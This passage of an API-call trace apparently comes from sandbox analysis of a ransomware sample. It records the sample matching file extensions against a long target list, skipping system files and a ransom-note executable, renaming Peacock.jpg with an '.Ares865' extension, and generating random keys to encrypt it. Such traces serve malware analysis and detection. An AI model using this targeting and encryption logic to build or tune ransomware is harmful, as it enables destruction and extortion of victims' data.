lstrcmpiW (lpString1="cock.jpg", lpString2="daschema") returned -1 [0063.587] lstrlenW (lpString="db-journal") returned 10 [0063.587] lstrcmpiW (lpString1="eacock.jpg", lpString2="db-journal") returned 1 [0063.587] lstrlenW (lpString="db-shm") returned 6 [0063.587] lstrcmpiW (lpString1="ck.jpg", lpString2="db-shm") returned -1 [0063.587] lstrlenW (lpString="db-wal") returned 6 [0063.587] lstrcmpiW (lpString1="ck.jpg", lpString2="db-wal") returned -1 [0063.587] lstrlenW (lpString="dbc") returned 3 [0063.587] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.588] lstrlenW (lpString="dbs") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.588] lstrlenW (lpString="dbt") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.588] lstrlenW (lpString="dbv") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.588] lstrlenW (lpString="dbx") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.588] lstrlenW (lpString="dcb") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.588] lstrlenW (lpString="dct") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.588] lstrlenW (lpString="dcx") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.588] lstrlenW (lpString="ddl") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.588] lstrlenW (lpString="dlis") returned 4 [0063.588] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.588] lstrlenW (lpString="dp1") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.588] lstrlenW (lpString="dqy") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.588] lstrlenW (lpString="dsk") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.588] lstrlenW (lpString="dsn") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.588] lstrlenW (lpString="dtsx") returned 4 [0063.588] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.588] lstrlenW (lpString="dxl") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.588] lstrlenW (lpString="eco") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0063.588] lstrlenW (lpString="ecx") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.588] lstrlenW (lpString="edb") returned 3 [0063.588] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.588] lstrlenW (lpString="epim") returned 4 [0063.589] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.589] lstrlenW (lpString="fcd") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.589] lstrlenW (lpString="fdb") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.589] lstrlenW (lpString="fic") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.589] lstrlenW (lpString="flexolibrary") returned 12 [0063.589] lstrlenW (lpString="fm5") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.589] lstrlenW (lpString="fmp") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.589] lstrlenW (lpString="fmp12") returned 5 [0063.589] lstrcmpiW (lpString1="k.jpg", lpString2="fmp12") returned 1 [0063.589] lstrlenW (lpString="fmpsl") returned 5 [0063.589] lstrcmpiW (lpString1="k.jpg", lpString2="fmpsl") returned 1 [0063.589] lstrlenW (lpString="fol") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.589] lstrlenW (lpString="fp3") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.589] lstrlenW (lpString="fp4") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.589] lstrlenW (lpString="fp5") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.589] lstrlenW (lpString="fp7") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.589] lstrlenW (lpString="fpt") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.589] lstrlenW (lpString="frm") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.589] lstrlenW (lpString="gdb") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.589] lstrlenW (lpString="gdb") returned 3 [0063.589] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.589] lstrlenW (lpString="grdb") returned 4 [0063.589] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.589] lstrlenW (lpString="gwi") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.590] lstrlenW (lpString="hdb") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.590] lstrlenW (lpString="his") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.590] lstrlenW (lpString="ib") returned 2 [0063.590] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.590] lstrlenW (lpString="idb") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.590] lstrlenW (lpString="ihx") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.590] lstrlenW (lpString="itdb") returned 4 [0063.590] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.590] lstrlenW (lpString="itw") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0063.590] lstrlenW (lpString="jet") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.590] lstrlenW (lpString="jtx") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.590] lstrlenW (lpString="kdb") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.590] lstrlenW (lpString="kexi") returned 4 [0063.590] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.590] lstrlenW (lpString="kexic") returned 5 [0063.590] lstrcmpiW (lpString1="k.jpg", lpString2="kexic") returned -1 [0063.590] lstrlenW (lpString="kexis") returned 5 [0063.590] lstrcmpiW (lpString1="k.jpg", lpString2="kexis") returned -1 [0063.590] lstrlenW (lpString="lgc") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.590] lstrlenW (lpString="lwx") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.590] lstrlenW (lpString="maf") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.590] lstrlenW (lpString="maq") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.590] lstrlenW (lpString="mar") returned 3 [0063.590] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.590] lstrlenW (lpString="marshal") returned 7 [0063.591] lstrcmpiW (lpString1="ock.jpg", lpString2="marshal") returned 1 [0063.591] lstrlenW (lpString="mas") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.591] lstrlenW (lpString="mav") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.591] lstrlenW (lpString="maw") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.591] lstrlenW (lpString="mdbhtml") returned 7 [0063.591] lstrcmpiW (lpString1="ock.jpg", lpString2="mdbhtml") returned 1 [0063.591] lstrlenW (lpString="mdn") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.591] lstrlenW (lpString="mdt") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.591] lstrlenW (lpString="mfd") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.591] lstrlenW (lpString="mpd") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.591] lstrlenW (lpString="mrg") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.591] lstrlenW (lpString="mud") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.591] lstrlenW (lpString="mwb") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0063.591] lstrlenW (lpString="myd") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.591] lstrlenW (lpString="ndf") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.591] lstrlenW (lpString="nnt") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.591] lstrlenW (lpString="nrmlib") returned 6 [0063.591] lstrcmpiW (lpString1="ck.jpg", lpString2="nrmlib") returned -1 [0063.591] lstrlenW (lpString="ns2") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.591] lstrlenW (lpString="ns3") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.591] lstrlenW (lpString="ns4") returned 3 [0063.591] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.592] lstrlenW (lpString="nsf") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.592] lstrlenW (lpString="nv") returned 2 [0063.592] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.592] lstrlenW (lpString="nv2") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.592] lstrlenW (lpString="nwdb") returned 4 [0063.592] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.592] lstrlenW (lpString="nyf") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.592] lstrlenW (lpString="odb") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.592] lstrlenW (lpString="odb") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.592] lstrlenW (lpString="oqy") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.592] lstrlenW (lpString="ora") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.592] lstrlenW (lpString="orx") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.592] lstrlenW (lpString="owc") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.592] lstrlenW (lpString="p96") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.592] lstrlenW (lpString="p97") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.592] lstrlenW (lpString="pan") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.592] lstrlenW (lpString="pdb") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.592] lstrlenW (lpString="pdm") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0063.592] lstrlenW (lpString="pnz") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0063.592] lstrlenW (lpString="qry") returned 3 [0063.592] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0063.592] lstrlenW (lpString="qvd") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0063.593] lstrlenW (lpString="rbf") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0063.593] lstrlenW (lpString="rctd") returned 4 [0063.593] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0063.593] lstrlenW (lpString="rod") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0063.593] lstrlenW (lpString="rodx") returned 4 [0063.593] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0063.593] lstrlenW (lpString="rpd") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0063.593] lstrlenW (lpString="rsd") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0063.593] lstrlenW (lpString="sas7bdat") returned 8 [0063.593] lstrcmpiW (lpString1="cock.jpg", lpString2="sas7bdat") returned -1 [0063.593] lstrlenW (lpString="sbf") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0063.593] lstrlenW (lpString="scx") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0063.593] lstrlenW (lpString="sdb") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0063.593] lstrlenW (lpString="sdc") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0063.593] lstrlenW (lpString="sdf") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0063.593] lstrlenW (lpString="sis") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0063.593] lstrlenW (lpString="spq") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0063.593] lstrlenW (lpString="te") returned 2 [0063.593] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0063.593] lstrlenW (lpString="teacher") returned 7 [0063.593] lstrcmpiW (lpString1="ock.jpg", lpString2="teacher") returned -1 [0063.593] lstrlenW (lpString="tmd") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0063.593] lstrlenW (lpString="tps") returned 3 [0063.593] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0063.593] lstrlenW (lpString="trc") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.594] lstrlenW (lpString="trc") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0063.594] lstrlenW (lpString="trm") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0063.594] lstrlenW (lpString="udb") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0063.594] lstrlenW (lpString="udl") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0063.594] lstrlenW (lpString="usr") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0063.594] lstrlenW (lpString="v12") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0063.594] lstrlenW (lpString="vis") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0063.594] lstrlenW (lpString="vpd") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0063.594] lstrlenW (lpString="vvv") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0063.594] lstrlenW (lpString="wdb") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0063.594] lstrlenW (lpString="wmdb") returned 4 [0063.594] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0063.594] lstrlenW (lpString="wrk") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0063.594] lstrlenW (lpString="xdb") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0063.594] lstrlenW (lpString="xld") returned 3 [0063.594] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0063.594] lstrlenW (lpString="xmlff") returned 5 [0063.594] lstrcmpiW (lpString1="k.jpg", lpString2="xmlff") returned -1 [0063.594] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.Ares865") returned 90 [0063.594] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\peacock.jpg"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\peacock.jpg.ares865"), dwFlags=0x1) returned 1 [0063.595] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\peacock.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.596] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5115) returned 1 [0063.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.596] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.597] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.597] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.597] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1700, lpName=0x0) returned 0x164 [0063.599] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1700) returned 0x190000 [0063.600] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.600] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.600] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0063.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0063.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.601] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.601] CloseHandle (hObject=0x164) returned 1 [0063.601] CloseHandle (hObject=0x154) returned 1 [0063.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.601] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.602] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.602] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x649d3c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x649d3c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xce12fdf6, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="aoldtz.exe") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2=".") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="..") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="windows") returned -1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="bootmgr") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="temp") returned -1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="pagefile.sys") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="boot") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="ids.txt") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="ntuser.dat") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="perflogs") returned 1 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2="MSBuild") returned 1 [0063.602] lstrlenW (lpString="Roses.htm") returned 9 [0063.602] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 82 [0063.602] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Roses.htm" | out: lpString1="Roses.htm") returned="Roses.htm" [0063.602] lstrlenW (lpString="Roses.htm") returned 9 [0063.602] lstrlenW (lpString="Ares865") returned 7 [0063.602] lstrcmpiW (lpString1="ses.htm", lpString2="Ares865") returned 1 [0063.602] lstrlenW (lpString=".dll") returned 4 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2=".dll") returned 1 [0063.602] lstrlenW (lpString=".lnk") returned 4 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2=".lnk") returned 1 [0063.602] lstrlenW (lpString=".ini") returned 4 [0063.602] lstrcmpiW (lpString1="Roses.htm", lpString2=".ini") returned 1 [0063.602] lstrlenW (lpString=".sys") returned 4 [0063.603] lstrcmpiW (lpString1="Roses.htm", lpString2=".sys") returned 1 [0063.603] lstrlenW (lpString="Roses.htm") returned 9 [0063.603] lstrlenW (lpString="bak") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.603] lstrlenW (lpString="ba_") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.603] lstrlenW (lpString="dbb") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.603] lstrlenW (lpString="vmdk") returned 4 [0063.603] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.603] lstrlenW (lpString="rar") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.603] lstrlenW (lpString="zip") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.603] lstrlenW (lpString="tgz") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.603] lstrlenW (lpString="vbox") returned 4 [0063.603] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.603] lstrlenW (lpString="vdi") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.603] lstrlenW (lpString="vhd") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.603] lstrlenW (lpString="vhdx") returned 4 [0063.603] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.603] lstrlenW (lpString="avhd") returned 4 [0063.603] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.603] lstrlenW (lpString="db") returned 2 [0063.603] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.603] lstrlenW (lpString="db2") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.603] lstrlenW (lpString="db3") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.603] lstrlenW (lpString="dbf") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.603] lstrlenW (lpString="mdf") returned 3 [0063.603] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.604] lstrlenW (lpString="mdb") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.604] lstrlenW (lpString="sql") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.604] lstrlenW (lpString="sqlite") returned 6 [0063.604] lstrcmpiW (lpString1="es.htm", lpString2="sqlite") returned -1 [0063.604] lstrlenW (lpString="sqlite3") returned 7 [0063.604] lstrcmpiW (lpString1="ses.htm", lpString2="sqlite3") returned -1 [0063.604] lstrlenW (lpString="sqlitedb") returned 8 [0063.604] lstrcmpiW (lpString1="oses.htm", lpString2="sqlitedb") returned -1 [0063.604] lstrlenW (lpString="xml") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.604] lstrlenW (lpString="$er") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.604] lstrlenW (lpString="4dd") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.604] lstrlenW (lpString="4dl") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.604] lstrlenW (lpString="^^^") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.604] lstrlenW (lpString="abs") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.604] lstrlenW (lpString="abx") returned 3 [0063.604] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.604] lstrlenW (lpString="accdb") returned 5 [0063.604] lstrcmpiW (lpString1="s.htm", lpString2="accdb") returned 1 [0063.604] lstrlenW (lpString="accdc") returned 5 [0063.604] lstrcmpiW (lpString1="s.htm", lpString2="accdc") returned 1 [0063.604] lstrlenW (lpString="accde") returned 5 [0063.604] lstrcmpiW (lpString1="s.htm", lpString2="accde") returned 1 [0063.604] lstrlenW (lpString="accdr") returned 5 [0063.604] lstrcmpiW (lpString1="s.htm", lpString2="accdr") returned 1 [0063.604] lstrlenW (lpString="accdt") returned 5 [0063.604] lstrcmpiW (lpString1="s.htm", lpString2="accdt") returned 1 [0063.604] lstrlenW (lpString="accdw") returned 5 [0063.604] lstrcmpiW (lpString1="s.htm", lpString2="accdw") returned 1 [0063.605] lstrlenW (lpString="accft") returned 5 [0063.605] lstrcmpiW (lpString1="s.htm", lpString2="accft") returned 1 [0063.605] lstrlenW (lpString="adb") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.605] lstrlenW (lpString="adb") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.605] lstrlenW (lpString="ade") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.605] lstrlenW (lpString="adf") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.605] lstrlenW (lpString="adn") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.605] lstrlenW (lpString="adp") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.605] lstrlenW (lpString="alf") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.605] lstrlenW (lpString="ask") returned 3 [0063.605] lstrcmpiW (lpString1="htm", 